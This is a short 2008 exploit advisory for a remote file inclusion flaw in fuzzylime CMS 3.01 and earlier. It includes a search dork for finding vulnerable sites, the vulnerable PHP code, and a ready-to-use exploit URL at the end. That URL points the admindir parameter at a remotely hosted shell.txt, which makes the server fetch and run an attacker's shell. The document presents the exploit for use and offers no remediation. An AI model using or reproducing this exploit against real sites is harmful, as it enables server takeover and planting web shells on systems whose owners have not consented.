fuzzylime-rfi.txt
Posted on 16 March 2008
.-----------------------------------------------------------------------------. | vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability | | download: http://cms.fuzzylime.co.uk/ | | dork: "powered by fuzzylime" | | | | author: irk4z@yahoo.pl | | homepage: http://irk4z.wordpress.com/ | | | | greets to: cOndemned, str0ke, wacky | '-----------------------------------------------------------------------------' # code: /code/display.php: ... 1 <? 2 $s = $_GET[s]; 3 $p = $_GET[p]; 4 $s = str_replace("../", "", $s); 5 $p = str_replace("../", "", $p); 6 if(empty($s)) $s = "front"; 7 if(empty($p)) $p = "index"; 8 $curs = $s; 9 $curp = $p; 10 11 include "code/settings.inc.php"; 12 include "${admindir}/languages/english.inc.php"; ... line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D:D # exploit: http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?
